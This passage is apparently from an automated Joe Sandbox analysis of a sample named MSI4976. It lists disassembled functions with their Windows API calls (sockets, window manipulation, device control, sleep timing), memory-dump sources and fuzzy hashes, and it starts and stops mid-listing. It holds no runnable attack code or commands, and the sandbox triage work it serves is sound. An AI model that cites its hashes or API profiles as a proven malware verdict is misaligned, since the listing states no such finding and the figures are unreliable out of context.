                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Internet$CloseConnectHandleOpen
                                        • String ID:
                                        • API String ID: 1463438336-0
                                        • Opcode ID: 371bcc47948a99a514ec9cb860760d224c6651ca9f23c8ec29d74b415d9af8a0
                                        • Instruction ID: 3e64c81ca875638d6180153be63c961e0391d7ae266fe82ae4845ec4729de49e
                                        • Opcode Fuzzy Hash: 371bcc47948a99a514ec9cb860760d224c6651ca9f23c8ec29d74b415d9af8a0
                                        • Instruction Fuzzy Hash: 3E21A731240605BFDB279F608C00F7BB7ADFB89711F14801AFA0A96550EB75E4119754
                                        Function 00388834 Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetWindowLongW.USER32(?,000000EC), ref: 003888A3
                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 003888BD
                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 003888CB
                                        • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 003888D9
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Window$Long$AttributesLayered
                                        • String ID:
                                        • API String ID: 2169480361-0
                                        • Opcode ID: cd4ed5f5e6ded06a8a05720f4e2652e2722abb96b822fbb52c41a36cbe517688
                                        • Instruction ID: 8703a30221f7709f333c7c5e9866b74023325d2e68d7b6747dd37e2a156f3226
                                        • Opcode Fuzzy Hash: cd4ed5f5e6ded06a8a05720f4e2652e2722abb96b822fbb52c41a36cbe517688
                                        • Instruction Fuzzy Hash: 33117F31205614AFDB16AB28DC05FAA7BADAF96320F544159F816CB2A1CB60AC008790
                                        Function 0037900C Relevance: 6.1, APIs: 4, Instructions: 69networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • select.WS2_32(00000000,00000001,00000000,00000000,?), ref: 0037906D
                                        • __WSAFDIsSet.WS2_32(00000000,00000001), ref: 0037907F
                                        • accept.WS2_32(00000000,00000000,00000000), ref: 0037908C
                                        • WSAGetLastError.WS2_32(00000000), ref: 003790A3
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: ErrorLastacceptselect
                                        • String ID:
                                        • API String ID: 385091864-0
                                        • Opcode ID: fd7eb77d7725c815c0fa11df1b0cf99a375a2f1cd93497679413edfc7d0d2387
                                        • Instruction ID: 48fc98b6632645ce978899eb8ce2df71337f4fcedfa8e8b6cfa3d173b333dc10
                                        • Opcode Fuzzy Hash: fd7eb77d7725c815c0fa11df1b0cf99a375a2f1cd93497679413edfc7d0d2387
                                        • Instruction Fuzzy Hash: C8215472A001249FC715DF69D885A9EBBFCEF4A710F00816AF84AD7290DA74DA45CB90
                                        Function 003618E8 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00362CAA: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,003618FD,?,?,?,003626BC,00000000,000000EF,00000119,?,?), ref: 00362CB9
                                          • Part of subcall function 00362CAA: lstrcpyW.KERNEL32(00000000,?,?,003618FD,?,?,?,003626BC,00000000,000000EF,00000119,?,?,00000000), ref: 00362CDF
                                          • Part of subcall function 00362CAA: lstrcmpiW.KERNEL32(00000000,?,003618FD,?,?,?,003626BC,00000000,000000EF,00000119,?,?), ref: 00362D10
                                        • lstrlenW.KERNEL32(?,00000002,?,?,?,?,003626BC,00000000,000000EF,00000119,?,?,00000000), ref: 00361916
                                        • lstrcpyW.KERNEL32(00000000,?,?,003626BC,00000000,000000EF,00000119,?,?,00000000), ref: 0036193C
                                        • lstrcmpiW.KERNEL32(00000002,cdecl,?,003626BC,00000000,000000EF,00000119,?,?,00000000), ref: 00361970
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: lstrcmpilstrcpylstrlen
                                        • String ID: cdecl
                                        • API String ID: 4031866154-3896280584
                                        • Opcode ID: 7d3cdb0c091ce71df2115c6b8051011aefd59dab8d023bc324eb94509f77e840
                                        • Instruction ID: 96810cdeeb46f4c9acc35be983ab7dc1369ddc90eb0a44a580e152dd8c24594e
                                        • Opcode Fuzzy Hash: 7d3cdb0c091ce71df2115c6b8051011aefd59dab8d023bc324eb94509f77e840
                                        • Instruction Fuzzy Hash: AC11DD3A200301AFDB16AF34D855D7A77F8FF85350B45C42AF806CB2A8EB71A85187E1
                                        Function 0036713C Relevance: 6.1, APIs: 4, Instructions: 64fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 0036715C
                                        • _memset.LIBCMT ref: 0036717D
                                        • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 003671CF
                                        • CloseHandle.KERNEL32(00000000), ref: 003671D8
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: CloseControlCreateDeviceFileHandle_memset
                                        • String ID:
                                        • API String ID: 1157408455-0
                                        • Opcode ID: 5a347bd39b790398cdacb720c3e9d9aac701d21e8d49435398e3618d04eef410
                                        • Instruction ID: c6adcb6f6cc24303d0310759a0118eeceb7596dd96954a227a04d2b0a7f7b66f
                                        • Opcode Fuzzy Hash: 5a347bd39b790398cdacb720c3e9d9aac701d21e8d49435398e3618d04eef410
                                        • Instruction Fuzzy Hash: 60110A729012287AD7315BA5AC4DFEBBABCEF46764F10419AF505E71D0D2704E808BA4
                                        Function 003613D1 Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 003613EE
                                        • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00361409
                                        • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 0036141F
                                        • FreeLibrary.KERNEL32(?), ref: 00361474
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                                        • String ID:
                                        • API String ID: 3137044355-0
                                        • Opcode ID: 4c1e4604c6aa77371734b16151a1cb2b9a63afdba0648e2904be706455893018
                                        • Instruction ID: 1994f42fdcce546115b8a6328e76c7c36c6fe7de919ee5c3ed5201e62c0d3b5b
                                        • Opcode Fuzzy Hash: 4c1e4604c6aa77371734b16151a1cb2b9a63afdba0648e2904be706455893018
                                        • Instruction Fuzzy Hash: A721AC75A00209ABDB239F92DC88ADABBBCEF00700F04C569A5129B554DBB4EA04CF90
                                        Function 0035C265 Relevance: 6.1, APIs: 4, Instructions: 58windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 0035C285
                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0035C297
                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0035C2AD
                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0035C2C8
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID:
                                        • API String ID: 3850602802-0
                                        • Opcode ID: cf9fc60cb2df284adfb9ab36619fffbdee2b5ac10cfac83f51353ef3b29a3bac
                                        • Instruction ID: 9e3fe90e4f139c82c011e7ce16751b28261487bcfb338eddaed69396a9a6b5ee
                                        • Opcode Fuzzy Hash: cf9fc60cb2df284adfb9ab36619fffbdee2b5ac10cfac83f51353ef3b29a3bac
                                        • Instruction Fuzzy Hash: 1E11487A900218FFDF11DFD8C880E9DBBB8FB08714F214091EA00B7290D671AE10DB94
                                        Function 00367C45 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetCurrentThreadId.KERNEL32 ref: 00367C6C
                                        • MessageBoxW.USER32(?,?,?,?), ref: 00367C9F
                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00367CB5
                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00367CBC
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                        • String ID:
                                        • API String ID: 2880819207-0
                                        • Opcode ID: 3d696d5a9808ac3ee81a5c2c9a1c3f1c16556c66122bff5d6922d7d30a753e77
                                        • Instruction ID: 4000f1f3a986537910125a3f734530453e83af68bded46f8146537d7c6f91aa9
                                        • Opcode Fuzzy Hash: 3d696d5a9808ac3ee81a5c2c9a1c3f1c16556c66122bff5d6922d7d30a753e77
                                        • Instruction Fuzzy Hash: 8A110472A04244BFC7139BA89C48AAA7FAD9B05324F558355F825D72D1D67089048BA0
                                        Function 003649D1 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON
                                        Download Yara Rule
                                        APIs
                                        • QueryPerformanceCounter.KERNEL32(?), ref: 003649EE
                                        • Sleep.KERNEL32(00000000), ref: 00364A13
                                        • QueryPerformanceCounter.KERNEL32(?), ref: 00364A1D
                                        • Sleep.KERNEL32(?), ref: 00364A50
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: CounterPerformanceQuerySleep
                                        • String ID:
                                        • API String ID: 2875609808-0
                                        • Opcode ID: 7aef42b8851a8cf68717dcbef9586971f725b9bedd2c9c0a380b83a158f4f626
                                        • Instruction ID: 5501d145e7d5c9ca68ef14e920d5fa98e97336e96e771bf6208ecc87431c9d9e
                                        • Opcode Fuzzy Hash: 7aef42b8851a8cf68717dcbef9586971f725b9bedd2c9c0a380b83a158f4f626
                                        • Instruction Fuzzy Hash: C9113C31D40518EBCF06EFE5E989AEEBF78FF0A711F018055E942B6254CB309550CBA9
                                        Function 00355BA2 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                        • String ID:
                                        • API String ID: 3016257755-0
                                        • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                        • Instruction ID: 7d49baf581dffe8f635a42ffdbc740a7830a6b862966e1c20fc1835888840d1f
                                        • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                        • Instruction Fuzzy Hash: E8017B3200064EBBCF135E84DC62CEE3F66BB18352B598914FE1859031C232EAB5AB81
                                        Function 003480E2 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0034869D: __getptd_noexit.LIBCMT ref: 0034869E
                                        • __lock.LIBCMT ref: 0034811F
                                        • InterlockedDecrement.KERNEL32(?), ref: 0034813C
                                        • _free.LIBCMT ref: 0034814F
                                        • InterlockedIncrement.KERNEL32(017D3588), ref: 00348167
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                        • String ID:
                                        • API String ID: 2704283638-0
                                        • Opcode ID: 1db4bb771325b55640b21dd0fe31a1f832f9bf2b855ba471c9acf958078e297e
                                        • Instruction ID: 94d1ac843da9e5597718b70d6cb7eb5f1914754855a94eba2188a5d10439521b
                                        • Opcode Fuzzy Hash: 1db4bb771325b55640b21dd0fe31a1f832f9bf2b855ba471c9acf958078e297e
                                        • Instruction Fuzzy Hash: 40016D76906A119BCB53AF65A8067ADB7E4BF05710F06041AF4156F791CF247842CBD2
                                        Function 00348724 Relevance: 6.0, APIs: 4, Instructions: 41COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • __lock.LIBCMT ref: 00348768
                                          • Part of subcall function 00348984: __mtinitlocknum.LIBCMT ref: 00348996
                                          • Part of subcall function 00348984: RtlEnterCriticalSection.NTDLL(00340127), ref: 003489AF
                                        • InterlockedIncrement.KERNEL32(DC840F00), ref: 00348775
                                        • __lock.LIBCMT ref: 00348789
                                        • ___addlocaleref.LIBCMT ref: 003487A7
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                        • String ID:
                                        • API String ID: 1687444384-0
                                        • Opcode ID: 20d9b11b4cbec5ee65331d1d55c1f0dc28411eafa5f9aa70f7f31b45395b984f
                                        • Instruction ID: 581f65e78f722df173b8f05f86badb687d7d1159d297d91346e2b4a5683838d4
                                        • Opcode Fuzzy Hash: 20d9b11b4cbec5ee65331d1d55c1f0dc28411eafa5f9aa70f7f31b45395b984f
                                        • Instruction Fuzzy Hash: A2016976415B009FE762EF65D90675AFBE0EF40325F20890EE0AA9F6A0CB70B640CB01
                                        Function 00369C73 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                        Download Yara Rule
                                        APIs
                                        • RtlEnterCriticalSection.NTDLL(?), ref: 00369C7F
                                          • Part of subcall function 0036AD14: _memset.LIBCMT ref: 0036AD49
                                        • _memmove.LIBCMT ref: 00369CA2
                                        • _memset.LIBCMT ref: 00369CAF
                                        • RtlLeaveCriticalSection.NTDLL(?), ref: 00369CBF
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: CriticalSection_memset$EnterLeave_memmove
                                        • String ID:
                                        • API String ID: 48991266-0
                                        • Opcode ID: f47a0160d8b3ceb53f9590e06354087be91528bedd25d0f3eefa52b9c28f2f12
                                        • Instruction ID: a51218281d36e785a7aaf715f9e93d1aada2b0a019a780f866a07ace87cc689e
                                        • Opcode Fuzzy Hash: f47a0160d8b3ceb53f9590e06354087be91528bedd25d0f3eefa52b9c28f2f12
                                        • Instruction Fuzzy Hash: 4AF0307A200000ABCF026F54EC85A49BB29EF45310F08C051FE099E217C731A811DBB5
                                        Function 0038E83C Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0033B58B: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0033B5EB
                                          • Part of subcall function 0033B58B: SelectObject.GDI32(?,00000000), ref: 0033B5FA
                                          • Part of subcall function 0033B58B: BeginPath.GDI32(?), ref: 0033B611
                                          • Part of subcall function 0033B58B: SelectObject.GDI32(?,00000000), ref: 0033B63B
                                        • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0038E860
                                        • LineTo.GDI32(00000000,?,?), ref: 0038E86D
                                        • EndPath.GDI32(00000000), ref: 0038E87D
                                        • StrokePath.GDI32(00000000), ref: 0038E88B
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                        • String ID:
                                        • API String ID: 1539411459-0
                                        • Opcode ID: 57b295fd4fe324a8fdc6490239b2279e8854625bd9ac5950bd230065d013e5ec
                                        • Instruction ID: f315361aec3e20e42220b363aacce704e3a25530d6cdd6df2a3b28662908b63d
                                        • Opcode Fuzzy Hash: 57b295fd4fe324a8fdc6490239b2279e8854625bd9ac5950bd230065d013e5ec
                                        • Instruction Fuzzy Hash: 26F05E31001269BADB136F54AC09FCE3F9DAF06711F048241FA12650E187759552CF95
                                        Function 0035D623 Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0035D640
                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 0035D653
                                        • GetCurrentThreadId.KERNEL32 ref: 0035D65A
                                        • AttachThreadInput.USER32(00000000), ref: 0035D661
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
